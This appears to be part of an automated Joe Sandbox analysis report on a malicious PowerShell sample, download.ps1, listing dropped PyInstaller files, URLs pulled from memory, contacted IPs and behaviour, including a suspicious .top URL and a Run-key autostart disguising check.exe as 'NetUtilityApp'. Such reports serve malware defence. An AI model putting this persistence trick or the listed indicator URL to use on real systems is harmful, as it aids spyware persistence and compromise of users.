C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qtiff.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qwbmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qwebp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qminimal.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qoffscreen.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qwebgl.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qwindows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtCore.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtGui.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtWidgets.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\sip.cp313-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\VCRUNTIME140_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_wmi.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md.cp313-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\psutil\_psutil_windows.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\python3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\python313.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\MSVCP140.dll	0%	ReversingLabs

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nodejs.org	104.20.22.46	true	false

URLs from Memory and Binaries

Name	Source	Malicious
https://github.com/giampaolo/psutil/issues/875.	check.exe, 00000005.00000002.2152722468.000001DB08EA4000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0801F000.00000004.00000020.00020000.00000000.sdmp	false
http://repository.swisssign.com//	check.exe, 00000005.00000002.2105400235.000001DB07ED3000.00000004.00000020.00020000.00000000.sdmp	false
https://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zip	check.exe, 00000005.00000002.2105260478.000001DB07C00000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmp	false
https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file	check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB07F6A000.00000004.00000020.00020000.00000000.sdmp	false
http://goo.gl/zeJZl.	check.exe, 00000005.00000002.2128958771.000001DB08660000.00000004.00001000.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc2388#section-4.4	check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmp	false
https://packaging.python.org/en/latest/specifications/entry-points/#file-format	check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB07F6A000.00000004.00000020.00020000.00000000.sdmp	false
http://hkinuxb3bz.top/1.php?s=527	powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmp	false
http://cacerts.digi	check.exe, 00000004.00000003.2208485892.0000028311F00000.00000004.00000020.00020000.00000000.sdmp	false
https://peps.python.org/pep-0205/	check.exe, 00000005.00000003.1840368079.000001DB079E2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1833669467.000001DB07581000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839250636.000001DB079E2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105029843.000001DB07B00000.00000004.00001000.00020000.00000000.sdmp	false
http://crl.dhimyotis.com/certignarootca.crl	check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	false
http://curl.haxx.se/rfc/cookie_spec.html	check.exe, 00000005.00000002.2120330998.000001DB08470000.00000004.00001000.00020000.00000000.sdmp	false
http://ocsp.accv.es	check.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2086234964.000001BBCF081000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	check.exe, 00000005.00000002.2107343749.000001DB08240000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1836530909.000001DB075A7000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1837728642.000001DB0759D000.00000004.00000020.00020000.00000000.sdmp	false
https://httpbin.org/get	check.exe, 00000005.00000002.2120330998.000001DB08470000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07D20000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2128958771.000001DB08654000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07ED3000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmp	false
https://go.micro	powershell.exe, 00000000.00000002.2086234964.000001BBD04D2000.00000004.00000800.00020000.00000000.sdmp	false
https://wwww.certigna.fr/autorites/0m	check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/python/cpython/issues/86361.	check.exe, 00000005.00000003.1839009875.000001DB07A9E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB07998000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1840262827.000001DB07A20000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1843045701.000001DB07998000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB07998000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1840325932.000001DB07A9E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839250636.000001DB079A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1840368079.000001DB079A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839110774.000001DB07A9E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839250636.000001DB07A1C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839088287.000001DB07A1D000.00000004.00000020.00020000.00000000.sdmp	false
http://mail.python.org/pipermail/python-dev/2012-June/120787.html.	check.exe, 00000005.00000002.2120330998.000001DB08470000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmp	false
https://httpbin.org/	check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmp	false
https://wwww.certigna.fr/autorites/	check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmp	false
http://www.color.org)	check.exe, 00000005.00000002.2159776261.00007FFBA009A000.00000002.00000001.01000000.00000024.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmp	false
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	check.exe, 00000005.00000002.2105400235.000001DB07EA2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmp	false
https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata	check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB07F6A000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.securetrust.com/STCA.crl	check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmp	false
http://wwwsearch.sf.net/):	check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/python/importlib_metadata/wiki/Development-Methodology	check.exe, 00000005.00000002.2105260478.000001DB07C00000.00000004.00001000.00020000.00000000.sdmp	false
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	false
http://www.accv.es/legislacion_c.htm	check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmp	false
http://tools.ietf.org/html/rfc6125#section-6.4.3	check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmp	false
http://crl.xrampsecurity.com/XGCA.crl0	check.exe, 00000005.00000002.2105400235.000001DB07ED3000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmp	false
http://www.cert.fnmt.es/dpcs/	check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	false
https://google.com/mail	check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E93000.00000004.00000020.00020000.00000000.sdmp	false
https://packaging.python.org/specifications/entry-points/	check.exe, 00000005.00000002.2107343749.000001DB08240000.00000004.00001000.00020000.00000000.sdmp	false
http://www.accv.es00	check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmp	false
https://www.python.org/psf/license/)	check.exe, 00000005.00000002.2179207812.00007FFBA1FA8000.00000002.00000001.01000000.0000000A.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmp	false
https://mahler:8092/site-updates.py	check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.securetrust.com/SGCA.crl	check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmp	false
http://.../back.jpeg	check.exe, 00000005.00000002.2120330998.000001DB08470000.00000004.00001000.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc7231#section-4.3.6)	check.exe, 00000005.00000002.2103701142.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844084262.000001DB07E1B000.00000004.00000020.00020000.00000000.sdmp	false
https://httpbin.org/post	check.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1845563446.000001DB079F1000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Ousret/charset_normalizer	check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmp	false
http://www.firmaprofesional.com/cps0	check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2920	check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmp	false
http://crl.securetrust.com/SGCA.crl0	check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	check.exe, 00000005.00000002.2101666628.000001DB05A38000.00000004.00000020.00020000.00000000.sdmp	false
https://yahoo.com/	check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E93000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.securetrust.com/STCA.crl0	check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmp	false
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	check.exe, 00000005.00000002.2105400235.000001DB07E6C000.00000004.00000020.00020000.00000000.sdmp	false
https://html.spec.whatwg.org/multipage/	check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp	false
http://www.quovadisglobal.com/cps0	check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmp	false
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl	check.exe, 00000005.00000002.2105400235.000001DB07ED3000.00000004.00000020.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	check.exe, 00000005.00000002.2107343749.000001DB08240000.00000004.00001000.00020000.00000000.sdmp	false
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0	check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	false
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	check.exe, 00000005.00000002.2105400235.000001DB07EA2000.00000004.00000020.00020000.00000000.sdmp	false
https://requests.readthedocs.io	check.exe, 00000005.00000002.2128958771.000001DB085A0000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1845563446.000001DB079F1000.00000004.00000020.00020000.00000000.sdmp	false
http://repository.swisssign.com/	check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmp	false
http://repository.swisssign.com//n	check.exe, 00000005.00000002.2105400235.000001DB07ED3000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.xrampsecurity.com/XGCA.crl	check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmp	false
https://www.python.org	check.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1845563446.000001DB079F1000.00000004.00000020.00020000.00000000.sdmp	false
http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/	check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp	false
http://www.accv.es/legislacion_c.htm0U	check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	false
http://www.aiim.org/pdfa/ns/id/	check.exe, 00000005.00000002.2159776261.00007FFBA009A000.00000002.00000001.01000000.00000024.sdmp	false
http://ocsp.accv.es0	check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	false
https://www.python.org/	check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp	false
https://json.org	check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/howto/mro.html.	check.exe, 00000005.00000002.2103370262.000001DB077E0000.00000004.00001000.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package	check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmp	false
https://twitter.com/	check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmp	false
https://stackoverflow.com/questions/4457745#4457745.	check.exe, 00000005.00000002.2152722468.000001DB08EA4000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0801F000.00000004.00000020.00020000.00000000.sdmp	false
http://www.cert.fnmt.es/dpcs/V	check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	false
http://www.quovadisglobal.com/cps	check.exe, 00000005.00000002.2105400235.000001DB0801F000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB0801F000.00000004.00000020.00020000.00000000.sdmp	false
https://google.com/	check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E93000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmp	false
https://google.com/mail/	check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp	false
http://google.com/mail/	check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/32902	check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/3290	check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmp	false
https://www.openssl.org/H	check.exe, 00000005.00000002.2173500044.00007FFBA1344000.00000002.00000001.01000000.0000001A.sdmp, check.exe, 00000005.00000002.2183903299.00007FFBA98D0000.00000002.00000001.01000000.0000001B.sdmp	false
http://crl.certigna.fr/certignarootca.crl01	check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2086234964.000001BBCF081000.00000004.00000800.00020000.00000000.sdmp	false
https://peps.python.org/pep-0263/	check.exe, 00000005.00000002.2179207812.00007FFBA1FA8000.00000002.00000001.01000000.0000000A.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.20.22.46	nodejs.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1571746
Start date and time:	2024-12-09 17:09:44 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	37
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	download.ps1
Detection:	MAL
Classification:	mal68.spyw.evad.winPS1@39/433@1/1
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 62% Number of executed functions: 47 Number of non-executed functions: 394
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12, 172.202.163.200, 20.190.147.12, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: download.ps1

Simulations

Behavior and APIs

Time	Type	Description
11:11:08	API Interceptor	46x Sleep call for process: powershell.exe modified
11:11:28	API Interceptor	3x Sleep call for process: check.exe modified
11:11:31	API Interceptor	3x Sleep call for process: WMIC.exe modified
11:11:49	API Interceptor	3x Sleep call for process: WerFault.exe modified
17:11:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
17:11:27	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_b144984def4d33843c3348cb5ac9d7933b983_17fc3fad_050c5ae3-066e-4837-9ee8-2f0cf13d244e\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3622897092676909
Encrypted:	false
SSDEEP:	192:+5IEi0PRjSjhI69SSim9r7kpZxQTWE2X7vKJS+r4xwn7KVw7wOVFOv1SnYzuiFpS:kIEpPRjSjsPwnmhRzuiFpY4lO80X
MD5:	7AC4384CE35BB13E211F42EEE1FED0EC
SHA1:	84B50582198292C1CAAAF3F68E0D20B02A4E5665
SHA-256:	00743777653F4C72A59D7110CE739799C1C9387085FE197BCACC453E0158E815
SHA-512:	30A4A7BCC84DFBDA104024FF19328691690B7EDB572D7DF94133D6874A37C027C28A5A2314B6334214B889334F8530228077498E4983A619BF90B8CF8FC5CAF1
Malicious:	false
Reputation:	unknown
